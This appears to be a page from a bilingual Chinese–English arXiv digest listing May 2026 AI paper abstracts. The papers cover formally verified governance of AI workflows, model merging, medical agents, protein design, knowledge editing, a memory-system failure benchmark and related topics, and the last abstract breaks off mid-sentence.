我们提出了一种受控执行的代数语义,其中治理被公理化、可组合且与可表达性共同存在。该框架在32个Rocq模块中机械化(约12,000行代码,454个定理,0个待定),基于交互树和参数化余归纳。一个三公理治理代数记录(安全性、透明性、恰当性)诱导出一个对称幺半范畴,具有经过验证的五边形、三角形和六边形一致性,其中每个张量组合都保持治理。一个代数效应系统约束处理子代数,使得在安全片段中只能构造保持治理的处理子;空能力集内的程序可证明仅发出可观察性指令。能力索引的组合将程序与机器检查的能力边界捆绑在一起,一个双重保证定理确立了在全体组合算子下within_caps和gov_safe同时成立。最终结果是共同边界:在我们的形式模型中,每个通过四个原始态射构造子可表达的程序在解释下都是受控的,且每个受控程序都是这样一个程序的像。图灵完备性在治理内部得以保留;无中介的I/O被排除在受控片段之外。治理拒绝被建模为安全的余归纳发散。治理代数是参数化的:任何实例化三个公理的系统都继承所有派生性质,包括收敛性、组合封闭性和目标保持性。提取的OCaml代码作为NIF在BEAM运行时中运行,通过基于属性的测试(70,000+随机输入,零分歧)确认了规范与运行时解释器之间的行为等价性。

英文摘要

We present an algebraic semantics for governed execution in which governance is axiomatized, compositional, and coterminous with expressibility. The framework, mechanized in 32 Rocq modules (~12,000 lines, 454 theorems, 0 admitted), is built on interaction trees and parameterized coinduction. A three-axiom GovernanceAlgebra record (safety, transparency, properness) induces a symmetric monoidal category with verified pentagon, triangle, and hexagon coherence, where every tensor composition preserves governance. An algebraic effect system constrains the handler algebra so that only governance-preserving handlers can be constructed in the safe fragment; programs in the empty capability set provably emit only observability directives. Capability-indexed composition bundles programs with machine-checked capability bounds, and a dual guarantee theorem establishes that within_caps and gov_safe hold simultaneously under all composition operators. The capstone result is the coterminous boundary: within our formal model, every program expressible via the four primitive morphism constructors is governed under interpretation, and every governed program is the image of such a program. Turing completeness is preserved inside governance; unmediated I/O is excluded from the governed fragment. Governance denial is modeled as safe coinductive divergence. The governance algebra is parametric: any system instantiating the three axioms inherits all derived properties, including convergence, compositional closure, and goal preservation. Extracted OCaml runs as a NIF in the BEAM runtime, with property-based testing (70,000+ random inputs, zero disagreements) confirming behavioral equivalence between the specification and the runtime interpreter.

2605.01030 2026-05-27 cs.AI cs.LO cs.PL 版本更新

Effect-Transparent Governance for AI Workflow Architectures: Semantic Preservation, Expressive Minimality, and Decidability Boundaries

AI工作流架构的效果透明治理:语义保持、表达最小性与可判定性边界

Alan L. McCann

发表机构 * Mashin, Inc.(Mashin公司)

AI总结 本文通过机器验证的形式化方法,证明在AI工作流架构中,效果级治理可以在不降低内部计算表达性的前提下实施,并建立了治理与计算表达性正交的理论基础。

Comments 15 pages. Companion proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. v2: corrected cross-reference identifiers for companion papers. License updated

详情
AI中文摘要

我们提出了一个经过机器验证的结构化治理AI工作流架构的形式化,并证明效果级治理可以在不降低内部计算表达性的情况下实施。使用Rocq 8.19中的交互树,我们定义了一个治理算子G,它中介所有有效指令,包括内存访问、外部调用和预言机(LLM)查询。我们的开发编译通过,无任何待证引理,包含36个模块、约12,000行Rocq代码和454个定理。我们建立了七个性质:(P1)受治理的图灵完备性;(P2)受治理的预言机表达性;(P3)一个可判定性边界,其中治理谓词是全的且在布尔组合下封闭,而语义程序性质保持非平凡且不可由治理判定;(P4)允许执行的目标保持性;(P5)原始能力(计算、内存、推理、外部调用、可观测性)的表达最小性;(P6)包含不对称性,表明结构治理严格包含内容级过滤;(P7)语义透明性:在所有治理允许的执行上,受治理的解释与未受治理的解释(模治理专属事件)在观测上等价。这些结果共同表明,治理和计算表达性是正交维度:治理约束程序的效果边界,同时对内部计算保持语义透明。

英文摘要

We present a machine-checked formalization of structurally governed AI workflow architectures and prove that effect-level governance can be imposed without reducing internal computational expressivity. Using Interaction Trees in Rocq 8.19, we define a governance operator G that mediates all effectful directives, including memory access, external calls, and oracle (LLM) queries. Our development compiles with 0 admitted lemmas and consists of 36 modules, ~12,000 lines of Rocq, and 454 theorems. We establishseven properties: (P1) governed Turing completeness, (P2) governed oracle expressivity, (P3) a decidability boundary in which governance predicates are total and closed under Boolean composition while semantic program properties remain non-trivial and undecidable by governance, (P4) goal preservation for permitted executions, (P5) expressive minimality of primitive capabilities (compute, memory, reasoning, external call, observability), (P6) subsumption asymmetry showing structural governance strictly subsumes content-level filtering, and (P7) semantic transparency: on all executions where governance permits, the governed interpretation is observationally equivalent (modulo governance-only events) to the ungoverned interpretation. Together, these results show that governance and computational expressivity are orthogonal dimensions: governance constrains the effect boundary of programs while remaining semantically transparent to internal computation.

2605.26693 2026-05-27 cs.LG cs.AI stat.ML 版本更新

Model Merging on Loss Landscape: A Geometry Perspective

损失景观上的模型合并:几何视角

Juanwu Lu, Anand Bhaskar, Brian Axelrod, Ekaterina Tolstaya, Tristan Emrich

发表机构 * Purdue University(普渡大学) Waymo LLC(Waymo公司)

AI总结 提出EpiMer框架,将模型合并视为黎曼流形上的Fréchet均值,利用任务向量张成的低秩子空间和期望Hessian度量,理论证明曲率感知合并优于平坦几何方法,并在八个图像分类任务上验证了性能提升。

Comments CVPR 2026 Findings Track. 18 pages, 4 figures, 6 tables

详情
AI中文摘要

模型合并为无需重新训练的知识集成和并行开发提供了有前景的途径。然而,现有方法要么忽略损失景观的几何结构,要么依赖于难以处理的全空间Hessian近似。我们提出EpiMer,一个将模型合并视为黎曼流形上Fréchet均值求解的框架,并将计算限制在由任务向量张成的低秩子空间内。以期望Hessian作为度量,我们揭示了局部曲率与参数认知不确定性之间的联系。我们的理论分析将合并误差界分解为子空间Fréchet方差和残差能量,并提供了曲率感知合并何时在理论上优于平坦几何方法的闭式刻画。此外,我们的框架将曲率感知方法和最近的谱方法统一为不同几何度量下子空间Fréchet均值的特例。在八个图像分类任务上合并微调的CLIP-ViT模型,Epistemic Merging在匹配秩下严格优于所有三个CLIP-ViT骨干网络的基线,提高了每个骨干网络上的跨任务平均准确率和最差任务准确率。

英文摘要

Model merging offers a promising avenue for knowledge integration and parallel development without retraining. Yet, existing methods either ignore the geometry of the loss landscape or rely on intractable full-space Hessian approximations. We propose EpiMer, a framework that casts model merging as solving the Fréchet mean on a Riemannian manifold and restricts the computation to a low-rank subspace spanned by the task vectors. With the expected Hessian as the metric, we reveal a connection between local curvature and epistemic uncertainty of the parameters. Our theoretical analysis decomposes the merging error bound into the subspace Fréchet variance and the residual energy, and provides a closed-form characterization of when curvature-aware merging provably outperforms flat-geometry methods. In addition, our framework unifies both curvature-aware methods and recent spectral methods as special cases of the subspace Fréchet mean with different geometric metrics. Merging fine-tuned CLIP-ViT models on eight image classification tasks, Epistemic Merging strictly outperforms the baselines on all three CLIP-ViT backbones at matched rank, improving the across-task average accuracy and worst-task accuracy on every backbone.

2605.26691 2026-05-27 cs.AI 版本更新

Mind the Tool Failures: Achieving Synergistic Tool Gains for Medical Agents

注意工具故障:实现医疗智能体的协同工具增益

Yunhui Gan, Tan Pan, Kaiyu Guo, Limei Han, Weimiao Yu, Guangnan Ye, Chen Jiang, Yuan Cheng

发表机构 * Fudan University(复旦大学) Shanghai Academy of Artificial Intelligence for Science(上海人工智能科学研究院) Shanghai Innovation Institute(上海创新研究院) The University of Queensland(昆士兰大学) Bioinformatics Institute (BII), Agency for Science, Technology and Research (A*STAR)(生物信息研究所(BII),科技研究局(A*STAR))

AI总结 针对医疗AI智能体在真实临床环境中工具可能失败的问题,提出基于GRPO的强化学习框架,通过实例级工具选择和分歧感知协同学习,实现错误工具共识的纠正,提升系统鲁棒性。

详情
AI中文摘要

医疗AI智能体越来越多地使用外部工具进行诊断、治疗建议和证据检索,但大多数现有方法假设任务合适的工具在其预期范围内是可靠的。这一假设在真实临床环境中是脆弱的,因为即使相关工具也可能在具有挑战性的实例上失败,并导致不安全的后续决策。为了解决这个问题,我们研究了不完美工具设置下的医疗工具使用,以纠正单个工具遗漏的失败实例。实例相关的失败模式在最佳固定单一工具和理想的实例级选择器之间产生了差距,我们称之为单一预言风险差距。核心挑战在于,传统的任务级工具选择无法实现这一差距,因为它本质上受限于最佳单一工具的性能。受此观察启发,我们考虑了实例级异质性,并将工具使用建模为实例级选择问题。特别地,我们提出了一个基于GRPO的强化学习框架,其奖励函数用于概率风险最小化和分歧感知协同学习,促进错误工具共识的实例级纠正。此外,采用熵引导的采样策略来提升高分歧实例的权重,这些实例为学习实例特定的工具协同提供了更强的信号。这两个组件相互补充,以减轻实例级异质性并改善工具协同。在两个任务和七个医疗基准上的实验表明,我们的方法在广泛的基线上持续实现了稳健且稳定的改进,突显了协同感知工具使用对于可靠医疗智能体系统的重要性。

英文摘要

Medical AI agents increasingly use external tools for diagnosis, treatment recommendation, and evidence retrieval, yet most existing approaches assume that task-appropriate tools are reliable within their intended scope. This assumption is fragile in real clinical settings, where even relevant tools may fail on challenging instances and lead to unsafe downstream decisions. To address this issue, we study medical tool use under imperfect-tool settings to correct failure instances missed by individual tools. Instance-dependent failure patterns create a gap between the best fixed single tool and an ideal instance-wise selector, which we refer to as the Single-Oracle risk gap. The core challenge is that conventional task-level tool selection cannot realize this gap, as it is inherently bounded by the performance of the best single tool. Motivated by this observation, we therefore account for instance-level heterogeneity and formulate tool use as an instance-level selection problem. Particularly, we propose a GRPO-based reinforcement learning framework with rewards for probabilistic risk minimization and disagreement-aware synergy learning, which promotes instance-level correction of erroneous tool consensus. Furthermore, an entropy-guided sampling strategy is adopted to upweight high-disagreement instances, which provide stronger signals for learning instance-specific tool synergy. These two components complement each other in mitigating instance-level heterogeneity and improving tool synergy. Experiments on two tasks and seven medical benchmarks show that our method consistently achieves robust and stable improvements over a broad range of baselines, highlighting the importance of synergy-aware tool use for reliable medical agentic systems.

2605.26690 2026-05-27 cs.LG cs.AI q-bio.QM 版本更新

Self-Improvement Imitation with Biologically Guided Search for Protein Design Under Oracle Budgets

SILO:基于生物引导搜索的自改进模仿用于预算约束下的蛋白质设计

Ashima Khanna, Dominik Grimm

发表机构 * Technical University of Munich(慕尼黑技术大学) University of Applied Sciences Weihenstephan-Triesdorf(魏因斯坦-特里斯多夫应用科学大学)

AI总结 提出SILO框架,通过层次化编辑策略、增量随机束搜索和UCB代理集成,在有限oracle预算下实现蛋白质序列优化,在8个蛋白质适应度景观上达到最优性能。

详情
AI中文摘要

在严格的oracle预算下进行蛋白质序列优化需要探索巨大的组合空间,同时使每次评估都具有信息量。现有的强化学习和离策略生成方法在代理噪声下性能下降,且位置无关的突变提议可能破坏功能关键残基。我们提出了SILO,一个用于oracle预算蛋白质设计的轨迹级自改进模仿框架。SILO使用层次化编辑策略,将每个突变分解为位置选择后跟残基选择。在每个主动学习轮次中,策略通过增量随机无放回束搜索(SBS)采样候选轨迹,结合基于UCB的代理集成和丙氨酸扫描适应度分数(AFS),选择具有功能相关编辑的候选进行计算机oracle评估。然后,通过在轮次中最佳oracle标记轨迹上的下一动作交叉熵模仿来更新策略,避免值函数估计。在八个复现的蛋白质适应度景观和来自先前工作的五个强基线上,SILO在我们的评估中在8/8的景观上实现了最高的最大和top-100平均适应度,通常表现出更快的早期改进。在每种设置两个景观的低数据和噪声代理压力测试中,当多个基线退化时,SILO保持竞争力或最佳。消融实验表明,SBS与AFS贡献了大部分增益,迭代模仿提供了额外改进。代码可在:https://github.com/grimmlab/SILO.git 获取。

英文摘要

Protein sequence optimization under tight oracle budgets requires methods that explore vast combinatorial spaces while making each evaluation informative. Existing reinforcement learning and off-policy generative approaches often degrade under surrogate noise, and position-agnostic mutation proposals risk disrupting functionally critical residues. We introduce SILO, a trajectory-level self-improvement imitation framework for oracle-budgeted protein design. SILO uses a hierarchical edit policy that decomposes each mutation into a position choice followed by a residue choice. In each active-learning round, the policy samples candidate trajectories via incremental stochastic beam search without replacement (SBS), and a UCB-based proxy ensemble, combined with an alanine-scan fitness score (AFS), selects candidates with functionally relevant edits for in silico oracle evaluation. The policy is then updated by next-action cross-entropy imitation on the round's best oracle-labeled trajectories, avoiding value-function estimation. Across eight reproduced protein fitness landscapes and five strong baselines from prior work, SILO achieves the highest maximum and top-100 mean fitness on 8 of 8 landscapes within our evaluations, often exhibiting faster early-stage improvement. In low-data and noisy-proxy stress tests on two landscapes per setting, SILO remains competitive or best when several baselines degrade. Ablations show that SBS with AFS account for much of the gains, with iterative imitation providing additional improvement. Code is available at: https://github.com/grimmlab/SILO.git

2605.26683 2026-05-27 cs.CL cs.AI 版本更新

An In-Vitro Study on Cross-Lingual Generalization in Language Models

语言模型中跨语言泛化的体外研究

Adrian Cosma

发表机构 * Dalle Molle Institute for Artificial Intelligence (IDSIA)(达勒莫利人工智能研究所(IDSIA))

AI总结 通过构建两种程序生成的语言,独立控制词汇距离、少数语言比例等变量,研究语言模型跨语言迁移的机制,发现迁移主要取决于分词是否保留可复用的跨语言子结构,且词汇量越小越有利于掩码迁移。

Comments 16 Figures, 1 Table

详情
AI中文摘要

在自然语料中,语言模型的跨语言迁移难以研究,因为词汇重叠、形态、数据不平衡和分词相互纠缠。我们引入了一个体外框架,使用两种程序生成的语言,它们共享相同的本体、类型化语法和组合结构,但表面实现不同。这使我们能够独立改变词汇距离、少数语言比例、分词器训练制度和词汇量大小,同时评估在掩码少数语言条件下的迁移,该条件的词汇形式在训练中从未被观察到。在700次受控运行中,我们发现迁移受分词器平衡或原始词汇相似性的影响较小,而更多地取决于分词是否保留可复用的跨语言子结构。较小的词汇量通常通过保持单词可分解为共享片段来改善掩码迁移,而较大的词汇量可能将形式转化为特定语言的原子。我们进一步表明,迁移是一个阶段性过程:语法和类型级能力先于掩码词汇泛化。最后,我们尝试通过分词器桥梁解释这一机制,并表明桥梁强度与掩码可达性密切相关。

英文摘要

Cross-lingual transfer in language models is difficult to study in natural corpora because lexical overlap, morphology, data imbalance, and tokenization are entangled. We introduce an in-vitro framework with two procedurally generated languages that share the same ontology, typed grammar, and compositional structure, but differ in surface realization. This lets us independently vary lexical distance, minority-language proportion, tokenizer training regime, and vocabulary size, while evaluating transfer on a masked minority-language condition whose lexical forms are never observed during training. Across 700 controlled runs, we find that transfer is governed less by tokenizer balance or raw lexical similarity than by whether tokenization preserves reusable cross-lingual substructure. Smaller vocabularies often improve masked transfer by keeping words decomposable into shared fragments, whereas larger vocabularies can turn forms into language-specific atoms. We further show that transfer emerges as a staged process: grammatical and type-level competence precede masked lexical generalization. Finally, we attempt to explain this mechanism through tokenizer bridges and show that bridge strength correlates strongly with masked reachability.

2605.26680 2026-05-27 cs.CV cs.AI 版本更新

DynFrame: Adaptive Reasoning-Driven Multimodal Framework with Dynamic Frame Augmentation for Complex Video Understanding

DynFrame: 自适应推理驱动的多模态框架与动态帧增强用于复杂视频理解

Peng Zhang, Guanghao Zhang, Wanggui He, Longxiang Zhang, Mushui Liu, Yan Xia, Zhenhao Peng, Weilong Dai, Jinlong Liu, Haobing Tang, Le Zhang, Hao Jiang, Pipei Huang

发表机构 * Zhejiang University(浙江大学) Alibaba Group(阿里巴巴集团)

AI总结 提出DynFrame框架,通过将时间窗口和采样密度作为原生token进行单步检索,并引入分段解耦GRPO优化,解决了视频多模态大模型中采样密度不可学习及检索与回答优化耦合的问题。

详情
AI中文摘要

最近视频多模态大语言模型(MLLMs)越来越多地将逐步推理与按需视觉证据检索相结合,允许模型在推理过程中重新访问相关视频片段。然而,现有的思考与视频系统仍存在两个结构性缺陷。(i)采样密度不是一个可学习的决策:现有方法可能让模型决定看哪里,但每个窗口的帧率基本固定。因此,细粒度证据通常通过重复的检索调用来恢复,这增加了推理上下文长度和训练难度。(ii)检索和答案生成通常使用单个轨迹级优势进行优化,因此“看哪里”的token和“如何回答”的token获得相同的信用,即使一个正确而另一个不正确。为了解决这些缺陷,我们提出了DynFrame,一个在单次自回归过程中将时间窗口和采样密度作为原生token发出的框架。这种可学习的跨度-密度检索使得单步检索即可获取多粒度证据。基于上述token化检索接口,我们进一步引入了分段解耦GRPO(SD-GRPO),它在检索边界分割每次展开,并分配角色特定的token级优势,分别对采样决策和答案进行信用分配。在精心策划的DM-CoT-74k和DM-RL-45k上训练后,DynFrame-4B在六个基准测试(NExT-GQA、Charades-STA、ActivityNet-MR、Video-MME、MLVU、LVBench)上与强大的7B-8B基线竞争,而DynFrame-8B在大多数指标上创造了新的最先进水平。代码可在https://github.com/zhangguanghao523/DynFrame获取。

英文摘要

Recent video multimodal large language models (MLLMs) increasingly couple step-by-step reasoning with on-demand visual evidence retrieval, allowing models to revisit relevant video segments during inference. However, two structural gaps remain in existing thinking-with-video systems. (i) Sampling density is not a learnable decision: existing methods may let the model decide where to look, but the per-window frame rate is largely fixed. As a result, fine-grained evidence is often recovered through repeated retrieval calls, which increases inference context length and training difficulty. (ii) Retrieval and answer generation are usually optimized with a single trajectory-level advantage, so the "where to look" tokens and the "how to answer" tokens receive the same credit even when one is correct and the other is not. To address these gaps, we present DynFrame, a framework that emits the temporal window and the sampling density as native tokens within a single autoregressive pass. This learnable span-density retrieval enables acquiring multi-granularity evidence with a single retrieval step. Based on the above tokenized retrieval interface, we further introduce Segment-Decoupled GRPO (SD-GRPO), which splits each rollout at the retrieval boundary and assigns role-specific token-level advantages, separately crediting the sampling decision and the answer. Trained on the curated DM-CoT-74k and DM-RL-45k, DynFrame-4B is competitive with strong 7B-8B baselines across six benchmarks (NExT-GQA, Charades-STA, ActivityNet-MR, Video-MME, MLVU, LVBench), and DynFrame-8B sets new state-of-the-art on most metrics. Code is available at https://github.com/zhangguanghao523/DynFrame.

2605.26679 2026-05-27 cs.CR cs.AI 版本更新

Certified Causal Attribution for Real-Time Attack Forensics in 6G Network Slicing

面向6G网络切片的实时攻击取证的可认证因果归因

Minh K. Quan, Pubudu N. Pathirana

发表机构 * School of Engineering, Deakin University(德肯大学工程学院)

AI总结 提出DA-GC框架,结合资源条件格兰杰因果与资源争用模型,在6G网络切片中实现亚100毫秒内的高精度跨切片攻击归因,并提供了完整的正式认证栈。

Comments IEEE TRANSACTIONS ON INFORMATION FORENSICS AND SECURITY

详情
AI中文摘要

6G网络中的跨切片攻击归因需要在100毫秒内通过共享基础设施识别因果传播链。现有方法在满足严格SLA时难以保持准确性,因为共享资源争用会产生虚假相关性,在标准格兰杰检验下与真实因果链接难以区分。我们提出DA-GC,一个可认证的因果归因框架,将资源条件格兰杰因果与公理推导的资源争用模型(RCM)相结合,系统性地阻断资源介导的混杂。在包含15个切片的生产仿真6G测试平台和1100个攻击场景中,DA-GC在87毫秒内实现了89.2%的归因准确率。相比最强基线,准确率提升7.9个百分点,延迟降低2.7倍,同时展示了跨拓扑泛化和概念漂移鲁棒性。关键的是,DA-GC拥有全面的正式认证栈。我们提供了数学证明的有效性证书,保证在序列依赖遥测和分段平稳性下的统计可靠性。此外,我们建立了严格的安全边界,包括对抗性利用欺骗的崩溃点δ* ≈ 0.95,并定义了可证明隐私和鲁棒部署所需的最小差分隐私噪声。

英文摘要

Cross-slice attack attribution in 6G networks requires identifying causal propagation chains through shared infrastructure in under 100 ms. Existing methods struggle to satisfy this strict SLA without sacrificing accuracy, because shared resource contention creates spurious correlations that are indistinguishable from genuine causal links under standard Granger tests. We propose DA-GC, a certified causal attribution framework that integrates resource-conditioned Granger causality with an axiomatically derived Resource Contention Model (RCM) to systematically block resource-mediated confounding. On a 15-slice production-emulation 6G testbed with 1,100 attack scenarios, DA-GC achieves 89.2% attribution accuracy at 87 ms. This represents a 7.9 percentage-point improvement over the strongest baseline at 2.7x lower latency, alongside demonstrated cross-topology generalization and concept-drift resilience. Crucially, DA-GC is backed by a comprehensive formal certification stack. We provide mathematically proven validity certificates for statistical soundness under serially dependent telemetry and piecewise-stationarity. Furthermore, we establish strict security bounds, including an adversarial utilization spoofing breakdown point of $δ^* \approx 0.95$, and define the minimum differential-privacy noise required for a provably private and robust deployment.

2605.26670 2026-05-27 cs.CL cs.AI 版本更新

The Labyrinth and the Thread: Rethinking Regularizations in Sequential Knowledge Editing for Large Language Models

迷宫与线索:重新思考大语言模型顺序知识编辑中的正则化方法

Zheng Wang, Kaixuan Zhang, Wanfang Chen, Jingwen Zhang, Xiaonan Lu

发表机构 * Bosch Center for Artificial Intelligence (BCAI)(博世人工智能中心(BCAI)) Bosch (China) Investment Ltd.(博世(中国)投资有限公司) School of Statistics, East China Normal University(东华大学统计学院)

AI总结 本文通过优化分析证明顺序编辑与一次性编辑的等价性,揭示稳定性源于累积编辑约束而非专门正则化,从而简化大语言模型知识编辑流程。

Comments Accepted for publication at ICML 2026

详情
AI中文摘要

大语言模型中结构化知识的顺序编辑允许在不重新训练的情况下进行有针对性的事实更新,但现有方法通常依赖于复杂的正则化或约束机制,其必要性尚不明确。在这项工作中,我们系统地研究了有效且稳定的顺序编辑背后的机制。具体来说,我们首先分析了AlphaEdit的经验成功,并通过严格的优化分析建立了一次性编辑与顺序编辑之间的形式等价性。基于这一见解,我们将等价性推广到更广泛的编辑目标类别,证明稳定性自然源于正确处理累积的编辑约束,而非专门的正则化或零空间操作。我们通过实验证实,许多常用的正则化策略对于可靠的顺序更新并非必要。此外,我们将我们的框架扩展到处理冲突编辑,确保在矛盾更新下具有鲁棒且一致的行为。最终,我们的工作为顺序编辑的迷宫提供了阿里阿德涅的线索,为更简单、更可解释且可靠的知识更新指明了道路。我们的代码可在https://github.com/Wangzzzzzzzz/OTE-SE-Alignment获取。

英文摘要

Sequential editing of structured knowledge in large language models allows targeted factual updates without retraining, yet existing methods often rely on complex regularization or constraint mechanisms whose necessity remains unclear. In this work, we systematically investigate the mechanisms underlying effective and stable sequential editing. Specifically, we first analyze the empirical success of AlphaEdit and establish, via a rigorous optimization analysis, the formal equivalence between one-time and sequential editing. Building on this insight, we generalize the equivalence to a broader class of editing objectives, demonstrating that stability emerges naturally from properly accounting for accumulated editing constraints, rather than from specialized regularization or null-space operations. We empirically confirm that many commonly used regularization strategies are unnecessary for reliable sequential updates. Furthermore, we extend our framework to handle conflicting edits, ensuring robust and consistent behavior under contradictory updates. Ultimately, our work provides Ariadne's thread through the labyrinth of sequential editing, charting a path toward simpler, more interpretable, and dependable knowledge updates. Our code is available at https://github.com/Wangzzzzzzzz/OTE-SE-Alignment.

2605.26667 2026-05-27 cs.AI cs.LG 版本更新

MemFail: Stress-Testing Failure Modes of LLM Memory Systems

MemFail: LLM记忆系统的故障模式压力测试

Ishir Garg, Neel Kolhe, Dawn Song, Xuandong Zhao

发表机构 * University of California, Berkeley(加州大学伯克利分校)

AI总结 提出MemFail基准测试,通过形式化记忆系统为摘要、存储和检索三个操作并构建对抗性数据集,系统性地评估和诊断LLM记忆系统的故障模式。

详情
AI中文摘要

大型语言模型(LLM)代理越来越依赖外部记忆系统以在长程交互中保持一致性,但关于这些系统具体故障模式和设计选择的实证研究很少。现有基准报告聚合的问答准确率,将记忆系统视为黑箱,无法将错误答案归因于系统的特定故障模式。我们引入MemFail,一个诊断性基准,用于隔离现代LLM记忆系统的故障模式。我们首先将记忆系统形式化为三个规范操作的组合——摘要、存储和检索——并识别每个操作可能引发的故障模式。基于这些假设的故障模式,我们构建了跨越四个任务的五个数据集,每个数据集都经过对抗性设计以测试记忆系统的特定操作。使用这些数据集,我们在MemFail上评估了四种最先进的记忆系统,并展示了MemFail如何用于实证理解记忆系统架构差异带来的权衡。

英文摘要

Large language model (LLM) agents increasingly rely on external memory systems to remain consistent across long-horizon interactions, but little empirical work has been done to understand the specific failure modes and design choices that these systems present. Existing benchmarks report aggregate question-answering accuracy and treat memory systems as black boxes, making it impossible to attribute an incorrect answer to a particular failure mode of the system. We introduce MemFail, a diagnostic benchmark that isolates the failure modes of modern LLM memory systems. We begin by formalizing memory systems as the composition of three canonical operations -- summarization, storage, and retrieval -- and identify the potential failure modes induced by each. Based on these hypothesized failure modes, we construct five datasets spanning four tasks, each adversarially designed to test a specific operation of a memory system. Using these datasets, we evaluate four state-of-the-art memory systems on MemFail and demonstrate how MemFail can be used to empirically understand the tradeoffs induced by differences in memory system architectures.

2605.26662 2026-05-27 cs.CL cs.AI econ.GN q-fin.EC 版本更新

AI evaluation may bias perceptions: The importance of context in interpreting academic writing

AI评估可能扭曲认知:语境在解读学术写作中的重要性

Shang Wu, Randol Yao

发表机构 * UC Irvine(加州大学欧文分校) MIT(麻省理工学院)

AI总结 本文通过构建AI相似度基准,发现忽略国家和领域差异的评估方法会系统性高估或低估某些群体中的AI使用,提出基于具体语境的基准以更准确评估科学写作中的AI使用。

详情
AI中文摘要

本文研究了当评估方法忽略国家和领域的语境差异时,科学写作中AI使用估计可能产生的偏差。利用Dimensions中期刊论文的大规模数据,我们基于人类撰写和LLM重写的摘要之间的差异构建了AI相似度基准。我们表明,合并基准可能混淆已有的风格差异与AI生成的文本,即使在LLM之前的出版物中也会在跨国家-领域组中产生显著扭曲。相比之下,特定国家-领域的基准减轻了这种扭曲,并提供了更可信的比较基线。将这些方法应用于2025年的出版物,结果显示合并基准系统性高估了某些国家和领域的AI使用,同时低估了其他国家和领域的AI使用。这些发现强调了语境感知测量对于准确和公平评估科学中AI使用的重要性。

英文摘要

This paper examines how estimates of AI use in scientific writing can be biased when evaluation methods ignore contextual differences across countries and fields. Using large-scale data on journal publications from Dimensions, we construct AI-likeness benchmarks based on differences between human-written and LLM-rephrased abstracts. We show that a pooled benchmark may confound pre-existing stylistic variation with AI-generated text, producing substantial distortions across country-field groups even in pre-LLM publications. In contrast, country-field-specific benchmarks attenuate such distortions and provide a more credible baseline for comparison. Applying these methods to publications in 2025 reveals that the pooled benchmark systematically overestimates AI use in certain countries and fields while underestimating it in others. These findings highlight the importance of context-aware measurement for accurate and equitable evaluation of AI use in science.

2605.26661 2026-05-27 cs.CV cs.AI 版本更新

Respecting Modality Gap in Post-hoc Out-of-distribution Detection with Pre-trained Vision-Language Models

在预训练视觉语言模型的后验分布外检测中尊重模态差距

Yuanwei Hu, Bo Peng, Yadan Luo, Zhen Fang, Ling Chen, Jie Lu

发表机构 * The University of Queensland(昆士兰大学) University of Technology Sydney(悉尼科技大学)

AI总结 针对预训练视觉语言模型在后验分布外检测中文本原型与视觉原型存在模态差距的问题,提出在线伪监督框架直接在视觉特征空间学习类原型,实现新最优性能。

详情
AI中文摘要

分布外(OOD)检测已成为一种流行的技术,通过识别来自未知类别的意外输入来增强机器学习模型的可靠性。预训练视觉语言模型(VLM)的最新进展使得无需访问分布内(ID)训练数据即可进行零样本OOD检测;在这种设置下,现有方法通常将类名的文本嵌入视为类原型。在本文中,我们通过理论证明现成的文本原型通常与最优视觉原型不对齐,从而产生无法通过提示工程单独消除的内在模态差距,来挑战广泛采用的文本即原型范式。为了在后验约束下缓解这一差距,本文提出了一种在线伪监督框架,该框架使用未标记的测试时数据流和预训练VLM的软预测,直接在视觉特征空间中学习类原型。我们为在线优化过程的收敛性提供了理论保证。大量实验经验证明,我们的方法在各种OOD检测设置中达到了新的最优水平。

英文摘要

Out-of-distribution (OOD) detection has emerged as a popular technique to enhance the reliability of machine learning models by identifying unexpected inputs from unknown classes. Recent progress in pre-trained vision-language models (VLMs) has enabled zero-shot OOD detection without access to in-distribution (ID) training data; in this setting, existing methods commonly treat text embeddings of class names as class prototypes. In this paper, we challenge the widely adopted text-as-prototype paradigm by theoretically showing that off-the-shelf textual prototypes are generally misaligned with the optimal visual prototypes, yielding an intrinsic modality gap that cannot be eliminated by prompt engineering alone. To mitigate this gap under the post-hoc constraint, this paper presents an online pseudo-supervised framework that directly learns class prototypes in the visual feature space using unlabeled test-time data streams and soft predictions from the pre-trained VLMs. We provide theoretical guarantees for the convergence of the online optimization procedure. Extensive experiments empirically demonstrate that our method achieves a new state of the art across a variety of OOD detection setups.

2605.26657 2026-05-27 cs.AI 版本更新

Completion vs Optimality: Policy Gradient in Long-Horizon Cumulative-Damage Problems

完成度与最优性:长时域累积损伤问题中的策略梯度

Wolfgang Maass, Sabine Janzen

发表机构 * Saarland University(萨尔兰大学) German Research Center for Artificial Intelligence (DFKI)(德国人工智能研究中心(DFKI))

AI总结 本文针对长时域累积损伤问题,识别策略梯度方法的两种正交失败模式(完成度和最优性),提出分解方法,并通过两个校准环境验证了四个可检验预测。

详情
AI中文摘要

具有累积损伤的长时域决策问题将局部吸引动作与全局不利结果耦合。我们识别了此类问题上策略梯度方法的两种正交失败模式,并提出一种将其分离的分解:\\emph{完成度}(达到终端时域而非通过隐式终端约束退出)和\\emph{最优性}(在给定完成度的情况下匹配动态规划参考)。在带有线性软惩罚的PPO下,仅授予时域访问会降低完成率:惩罚的均衡将主导活动份额推向零,而动作空间限制结合时域访问实现了完成度,但留下了最优性差距($ΔM_{\\text{final}} = 0.271$),我们将其追溯到损伤起源处的第一阶段贪婪承诺。我们推导了四个可检验预测,并在两个独立校准环境中进行评估,这两个环境共享相同的抽象结构,但在领域、时域、活动集和校准数据上不同:一个49步的砖瓦工职业生涯和一个20赛季的NBA大前锋职业生涯。所有四个预测均定性复现。时域不变性预测在四个测试时域中的三个得到满足,例外出现在$H = 15$,与$H^*$边界一致(在NBA参数下$H^* \\\in [6, 14]$)。

英文摘要

Long-horizon decision problems with cumulative damage couple locally attractive actions to globally adverse outcomes. We identify two orthogonal failure modes for policy-gradient methods on this class and propose a decomposition that separates them: \emph{completion} (reaching the terminal horizon rather than exiting via an implicit terminal constraint) and \emph{optimality} (matching the dynamic-programming reference given completion). Under PPO with a linear soft penalty, granting horizon access alone reduces the completion rate: the penalty's equilibrium drives the dominant-activity share to zero, while action-space restriction combined with horizon access achieves completion but leaves an optimality gap ($ΔM_{\text{final}} = 0.271$) that we trace to first-phase greedy commitment at the damage origin. We derive four testable predictions and evaluate them in two separately calibrated environments that share the same abstract structure but differ in domain, horizon, activity set, and calibration data: a 49-step bricklayer career and a 20-season NBA power-forward career. All four predictions replicate qualitatively. The horizon-invariance prediction is met at three of four tested horizons, with the exception at $H = 15$ consistent with the $H^*$ boundary ($H^* \in [6, 14]$ under the 